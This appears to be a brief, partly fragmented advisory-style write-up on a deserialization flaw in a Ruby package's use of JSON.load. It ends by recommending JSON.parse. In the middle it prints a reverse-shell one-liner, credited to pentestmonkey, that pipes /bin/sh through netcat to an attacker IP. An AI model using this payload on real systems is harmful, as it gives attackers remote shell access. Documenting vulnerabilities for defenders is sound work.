visit
Affected versions of this package are vulnerable to Deserialization of Untrusted Data due to the usage of JSON.load
, which is considered unsafe when used with untrusted input.
2. To import the library fire ‘Interactive Ruby Shell’ with the following mentioned command:
irb
4. Pick the desired payload, I have picked one from pentestmonkey:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'IP' 1234 >/tmp/f
It is recommended to use JSON.parse
instead of JSON.load
. In this case, we observed that the JSON.load
has failed to validate the input data which leads to Remote Code Execution.